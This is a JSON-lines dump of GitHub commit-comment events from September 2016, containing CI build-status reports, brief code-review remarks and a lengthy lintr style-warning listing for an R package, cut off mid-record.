{"id":"4605522998","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19138009,"position":null,"line":null,"path":null,"commit_id":"c9f241e9ab22b8c88ce8cad49e84c4ba1345b219","created_at":"2016-09-22T22:36:11Z","updated_at":"2016-09-22T22:36:11Z","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (1788 of 1788 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c9f241e9ab22b8c88ce8cad49e84c4ba1345b219-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c9f241e9ab22b8c88ce8cad49e84c4ba1345b219-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-22T22:36:11Z"}
{"id":"4605524848","type":"CommitCommentEvent","actor":{"login":"cxhernandez"},"repo":{"name":"msmbuilder/mdentropy"},"payload":{"comment":{"id":19138015,"position":null,"line":null,"path":null,"commit_id":"63441b15cf91839f7493bd77d824bf1337a4ff1e","created_at":"2016-09-22T22:36:37Z","updated_at":"2016-09-22T22:36:37Z","body":"Reducing the number of bins to 3 seems to improve performance for the normalized case:\r\n\r\n![nmutinf-benchmark-3](https://cloud.githubusercontent.com/assets/5142365/18768474/39df9aa4-80da-11e6-9d5c-d9e69ce5771b.png)\r\n"}},"created_at":"2016-09-22T22:36:37Z"}
{"id":"4605524850","type":"CommitCommentEvent","actor":{"login":"mschuchard"},"repo":{"name":"AtomLinter/linter-puppet-lint"},"payload":{"comment":{"id":19138016,"position":null,"line":null,"path":null,"commit_id":"7070ee06f59cfdbbd5e03f75d8a57a54c2e39a42","created_at":"2016-09-22T22:36:37Z","updated_at":"2016-09-22T22:36:37Z","body":"Is this a new capability for Atom? I am a bit confused on the advantage of parsing the metadata instead of the code for the config settings. Is it faster/more reliable?"}},"created_at":"2016-09-22T22:36:37Z"}
{"id":"4605532610","type":"CommitCommentEvent","actor":{"login":"kgoedecke"},"repo":{"name":"codetricity/osc-server"},"payload":{"comment":{"id":19138042,"position":null,"line":null,"path":null,"commit_id":"d69ddb119d566b2947fd6e5e12f988602790dcbc","created_at":"2016-09-22T22:38:27Z","updated_at":"2016-09-22T22:38:27Z","body":"Yeah I noticed that already, I'm currently trying to use the Mock Server as a replacement for a Theta S. There are also some camera specific parameters, which I might include in a special branch.\r\n\r\nOther than that, was the mock server intended to only support v1?\r\n\r\nCheers"}},"created_at":"2016-09-22T22:38:27Z"}
{"id":"4605540155","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/chromium"},"payload":{"comment":{"id":19138068,"position":null,"line":null,"path":null,"commit_id":"a0a3928a75e685ce3ca023685767e85ae1d30aa7","created_at":"2016-09-22T22:40:17Z","updated_at":"2016-09-22T22:40:17Z","body":"++"}},"created_at":"2016-09-22T22:40:17Z"}
{"id":"4605541237","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19138072,"position":null,"line":null,"path":null,"commit_id":"c9f241e9ab22b8c88ce8cad49e84c4ba1345b219","created_at":"2016-09-22T22:40:32Z","updated_at":"2016-09-22T22:40:32Z","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c9f241e9ab22b8c88ce8cad49e84c4ba1345b219-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-22T22:40:32Z"}
{"id":"4605543612","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"pcfthecf/homework-city"},"payload":{"comment":{"id":19138079,"position":1,"line":1,"path":"js/index.js","commit_id":"d97c58a122778711b2995815bd67e5dad117c9b0","created_at":"2016-09-22T22:41:06Z","updated_at":"2016-09-22T22:41:06Z","body":"Happy to see the steps all laid out and comments throughout!"}},"created_at":"2016-09-22T22:41:06Z"}
{"id":"4605544167","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"pcfthecf/homework-city"},"payload":{"comment":{"id":19138080,"position":15,"line":15,"path":"js/index.js","commit_id":"d97c58a122778711b2995815bd67e5dad117c9b0","created_at":"2016-09-22T22:41:14Z","updated_at":"2016-09-22T22:41:14Z","body":"👍 "}},"created_at":"2016-09-22T22:41:14Z"}
{"id":"4605545372","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"pcfthecf/homework-city"},"payload":{"comment":{"id":19138083,"position":26,"line":26,"path":"js/index.js","commit_id":"d97c58a122778711b2995815bd67e5dad117c9b0","created_at":"2016-09-22T22:41:31Z","updated_at":"2016-09-22T22:41:31Z","body":"Great work with the conditionals and using the attr() selector!  💯 "}},"created_at":"2016-09-22T22:41:31Z"}
{"id":"4605547670","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/electron-prebuilt"},"payload":{"comment":{"id":19138093,"position":null,"line":null,"path":null,"commit_id":"c4d0d82e8b20c018a2c8bf9e1fba440545399fd6","created_at":"2016-09-22T22:42:05Z","updated_at":"2016-09-22T22:42:05Z","body":"++"}},"created_at":"2016-09-22T22:42:05Z"}
{"id":"4605548860","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/electron-download"},"payload":{"comment":{"id":19138097,"position":null,"line":null,"path":null,"commit_id":"4a52085491b9abb82ae5843308532a6b44abf4d2","created_at":"2016-09-22T22:42:22Z","updated_at":"2016-09-22T22:42:22Z","body":"++"}},"created_at":"2016-09-22T22:42:22Z"}
{"id":"4605555847","type":"CommitCommentEvent","actor":{"login":"bridiver"},"repo":{"name":"brave/electron-prebuilt"},"payload":{"comment":{"id":19138118,"position":null,"line":null,"path":null,"commit_id":"c4d0d82e8b20c018a2c8bf9e1fba440545399fd6","created_at":"2016-09-22T22:44:10Z","updated_at":"2016-09-22T22:44:10Z","body":"works better when I use it in a nodejs file ;)"}},"created_at":"2016-09-22T22:44:10Z"}
{"id":"4605558163","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"pcfthecf/homework-city"},"payload":{"comment":{"id":19138121,"position":7,"line":9,"path":"js/drop-down.js","commit_id":"e2ad3935b94940194ef5b14d1fec8203fcde217b","created_at":"2016-09-22T22:44:47Z","updated_at":"2016-09-22T22:44:47Z","body":"great use of array!"}},"created_at":"2016-09-22T22:44:47Z"}
{"id":"4605558231","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"pcfthecf/homework-city"},"payload":{"comment":{"id":19138122,"position":11,"line":12,"path":"js/drop-down.js","commit_id":"e2ad3935b94940194ef5b14d1fec8203fcde217b","created_at":"2016-09-22T22:44:48Z","updated_at":"2016-09-22T22:44:48Z","body":"👍 "}},"created_at":"2016-09-22T22:44:48Z"}
{"id":"4605558761","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"gregarndt/servo"},"payload":{"comment":{"id":19138127,"position":null,"line":null,"path":null,"commit_id":"c5a8460acff0c64d4dba9d327cdcabef5ff4ba72","created_at":"2016-09-22T22:44:56Z","updated_at":"2016-09-22T22:44:56Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#BaUC3cKxQiGQbT9v4eyhcw"}},"created_at":"2016-09-22T22:44:56Z"}
{"id":"4605559065","type":"CommitCommentEvent","actor":{"login":"Korrow"},"repo":{"name":"important-business/engine"},"payload":{"comment":{"id":19138128,"position":null,"line":null,"path":null,"commit_id":"868ae912b05c48fd31129f8aa9bf9c810478a0a5","created_at":"2016-09-22T22:45:02Z","updated_at":"2016-09-22T22:45:02Z","body":"_std::vector<Listener*> m_listeners;_ uses **vector**\r\nhttp://en.cppreference.com/w/cpp/container/vector\r\n\r\n_std::remove(m_listeners.begin(), m_listeners.end(), &listener),_ uses **algorithm**\r\nhttp://en.cppreference.com/w/cpp/algorithm/remove\r\n\r\nThe algorithm include would probably make more sense in the implementation file though, since it isn't used in the class itself."}},"created_at":"2016-09-22T22:45:02Z"}
{"id":"4605562292","type":"CommitCommentEvent","actor":{"login":"moiseev"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":19138135,"position":5,"line":374,"path":"stdlib/public/core/UnicodeScalar.swift","commit_id":"628b7c9e16733b275b5060df30c03523a6639b45","created_at":"2016-09-22T22:45:52Z","updated_at":"2016-09-22T22:45:52Z","body":"I should have phrased it differently, probably. Can you make it explicitly `internal`, please?"}},"created_at":"2016-09-22T22:45:52Z"}
{"id":"4605562281","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"pcfthecf/homework-city"},"payload":{"comment":{"id":19138136,"position":14,"line":14,"path":"js/drop-down.js","commit_id":"929a8ee204f1d7b73d9dac0637410bfec1fb20ad","created_at":"2016-09-22T22:45:53Z","updated_at":"2016-09-22T22:45:53Z","body":"Awesome work populating the `<select>` and great job providing a value to the \"value\" attribute as well!  "}},"created_at":"2016-09-22T22:45:53Z"}
{"id":"4605562903","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"thijsjanzen/GUILDS"},"payload":{"comment":{"id":19138139,"position":null,"line":null,"path":null,"commit_id":"e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e","created_at":"2016-09-22T22:46:02Z","updated_at":"2016-09-22T22:46:02Z","body":"[R/Condition.R:23:17:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/Condition.R#L23) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  k  <-  lgamma((theta_x / 2) + (theta_y / 2)) -\n                ^\n```\n[R/Condition.R:25:9:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/Condition.R#L25) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  l  <- ( (theta_x / 2) - 1) * log(nx) + ((theta_y / 2) - 1) * log(ny)\n        ^\n```\n[R/Condition.R:25:43:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/Condition.R#L25) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  l  <- ( (theta_x / 2) - 1) * log(nx) + ((theta_y / 2) - 1) * log(ny)\n                                          ^\n```\n[R/Condition.R:115:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/Condition.R#L115) *style:* **Variable and function names should be all lowercase.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:115:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/Condition.R#L115) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:115:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/Condition.R#L115) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:137:9:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/Condition.R#L137) *style:* **Variable and function names should be all lowercase.**\n```r\n​  ll <- logLikelihood.Guilds(parameters, model, sadx, sady, verbose)\n        ^~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:137:9:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/Condition.R#L137) *warning:* **no visible global function definition for ‘logLikelihood.Guilds’**\n```r\n​  ll <- logLikelihood.Guilds(parameters, model, sadx, sady, verbose)\n        ^~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:140:23:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/Condition.R#L140) *warning:* **no visible global function definition for ‘calc_conditional’**\n```r\n​  conditional_part <- calc_conditional(parameters, model, Nx, Ny)\n                      ^~~~~~~~~~~~~~~~\n```\n[R/Condition.R:146:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/Condition.R#L146) *style:* **Variable and function names should be all lowercase.**\n```r\n​conditional.LogLik <- function(v, model, J, Sx, Sy, Nx, Ny, kda_x, kda_y,\n^~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:166:9:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/Condition.R#L166) *style:* **Variable and function names should be all lowercase.**\n```r\n​  ll <- logLikguilds(theta_x, theta_y, alpha_x, alpha_y, J,\n        ^~~~~~~~~~~~\n```\n[R/Condition.R:170:14:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/Condition.R#L170) *warning:* **no visible global function definition for ‘calc_conditional’**\n```r\n​  cond_ll <- calc_conditional(v, model, Nx, Ny)\n             ^~~~~~~~~~~~~~~~\n```\n[R/Condition.R:175:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/Condition.R#L175) *style:* **Variable and function names should be all lowercase.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(init_vals, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:175:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/Condition.R#L175) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(init_vals, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:175:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/Condition.R#L175) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(init_vals, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:179:12:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/Condition.R#L179) *style:* **Variable and function names should be all lowercase.**\n```r\n​  kda_x <- calcKDA(sadx)\n           ^~~~~~~\n```\n[R/Condition.R:179:12:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/Condition.R#L179) *warning:* **no visible global function definition for ‘calcKDA’**\n```r\n​  kda_x <- calcKDA(sadx)\n           ^~~~~~~\n```\n[R/Condition.R:180:12:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/Condition.R#L180) *style:* **Variable and function names should be all lowercase.**\n```r\n​  kda_y <- calcKDA(sady)\n           ^~~~~~~\n```\n[R/Condition.R:180:12:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/Condition.R#L180) *warning:* **no visible global function definition for ‘calcKDA’**\n```r\n​  kda_y <- calcKDA(sady)\n           ^~~~~~~\n```\n[R/Condition.R:201:17:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/Condition.R#L201) *style:* **Variable and function names should be all lowercase.**\n```r\n​    out <- -1 * conditional.LogLik(x, model, J, Sx, Sy, Nx, Ny,\n                ^~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:209:10:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/Condition.R#L209) *warning:* **no visible global function definition for ‘simplex’, Did you mean 'complex'?**\n```r\n​    x <- simplex(init_vals, g, verbose)\n         ^~~~~~~\n```\n[R/drawLocal.R:8:19:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L8) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​      return(-1 * pm_sadaux(x, I, th, j, k))\n                  ^~~~~~~~~\n```\n[R/drawLocal.R:9:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/drawLocal.R:10:36:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L10) *style:* **Commas should always have a space after.**\n```r\n​    xmax <- stats::optimize(f, c(0,1))$minimum\n                                   ^\n```\n[R/drawLocal.R:11:13:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L11) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​    ymax <- pm_sadaux(xmax, I, th, j, k)\n            ^~~~~~~~~\n```\n[R/drawLocal.R:12:11:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L12) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​    y0 <- pm_sadaux(0, I, th, j, k)\n          ^~~~~~~~~\n```\n[R/drawLocal.R:14:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t} else if ((k == j) && (th == 1)) {\n^~\n```\n[R/drawLocal.R:15:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  y[idx1] <- 0\n^~\n```\n[R/drawLocal.R:16:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t} else if ((k == j) && (th < 1)) {\n^~\n```\n[R/drawLocal.R:17:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  y[idx1] <- Inf\n^~\n```\n[R/drawLocal.R:17:16:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L17) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​        return(pm_sadaux(x, I, th, j, k) - ymax + 1)\n               ^~~~~~~~~\n```\n[R/drawLocal.R:18:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:22:11:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L22) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​    y1 <- pm_sadaux(x1, I, th, j, k)\n          ^~~~~~~~~\n```\n[R/drawLocal.R:23:10:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L23) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    while(ymax < (y1 + 1)) {\n         ^\n```\n[R/drawLocal.R:25:13:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L25) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​      y1 <- pm_sadaux(x1, I, th, j, k)\n            ^~~~~~~~~\n```\n[R/drawLocal.R:26:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L26) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:27:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L27) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tf <- function(x) {\n^~\n```\n[R/drawLocal.R:27:19:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L27) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tf <- function(x) {\n                 ~^~~\n```\n[R/drawLocal.R:28:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t\treturn(pm_sadaux(x, I, th, j, k)- ymax + 1)\n^~~~\n```\n[R/drawLocal.R:28:12:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L28) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\t\t\treturn(pm_sadaux(x, I, th, j, k)- ymax + 1)\n           ^~~~~~~~~\n```\n[R/drawLocal.R:29:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L29) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:30:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L30) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\n^~\n```\n[R/drawLocal.R:30:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L30) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\t\n^~\n```\n[R/drawLocal.R:31:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L31) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txplu <- stats::uniroot(f, c(xmax, x1), tol = pracma::eps())$root\n^~\n```\n[R/drawLocal.R:31:22:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txplu <- stats::uniroot(f, c(xmax, x1), tol = pracma::eps())$root\n                    ~^~~\n```\n[R/drawLocal.R:31:60:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txplu <- stats::uniroot(f, c(xmax, x1), tol = pracma::eps())$root\n                                                          ~^~\n```\n[R/drawLocal.R:32:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L32) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n^~\n```\n[R/drawLocal.R:32:22:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n                    ~^~~\n```\n[R/drawLocal.R:32:30:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n                            ~^~\n```\n[R/drawLocal.R:32:35:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n                                 ~^\n```\n[R/drawLocal.R:32:36:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L32) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n                                   ^\n```\n[R/drawLocal.R:33:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L33) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txlft <- max(0, xlft)\n^~\n```\n[R/drawLocal.R:33:22:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txlft <- max(0, xlft)\n                    ~^~~\n```\n[R/drawLocal.R:34:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L34) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txrgt <- xmax + 10 * (xplu - xmax)\n^~\n```\n[R/drawLocal.R:34:22:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txrgt <- xmax + 10 * (xplu - xmax)\n                    ~^~~\n```\n[R/drawLocal.R:34:30:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txrgt <- xmax + 10 * (xplu - xmax)\n                            ~^~\n```\n[R/drawLocal.R:34:35:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txrgt <- xmax + 10 * (xplu - xmax)\n                                 ~^~\n```\n[R/drawLocal.R:35:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L35) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txrgt <- min(1, xrgt)\n^~\n```\n[R/drawLocal.R:35:22:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txrgt <- min(1, xrgt)\n                    ~^~~\n```\n[R/drawLocal.R:37:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L37) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tf <- function(x) {\n^~\n```\n[R/drawLocal.R:37:19:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L37) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tf <- function(x) {\n                 ~^~~\n```\n[R/drawLocal.R:38:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L38) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t    return( exp( pm_sadaux(x, I, th, j, k)))\n^~\n```\n[R/drawLocal.R:38:20:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L38) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\t    return( exp( pm_sadaux(x, I, th, j, k)))\n                   ^~~~~~~~~\n```\n[R/drawLocal.R:39:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L39) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:41:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L41) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tres[cnt] <- integrate(f, xlft, xrgt, abs.tol = 1e-9)$val  #checked!!!!!1\n^~\n```\n[R/drawLocal.R:41:26:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L41) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tres[cnt] <- integrate(f, xlft, xrgt, abs.tol = 1e-9)$val  #checked!!!!!1\n                        ~^~~\n```\n[R/drawLocal.R:41:62:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L41) *style:* **Put 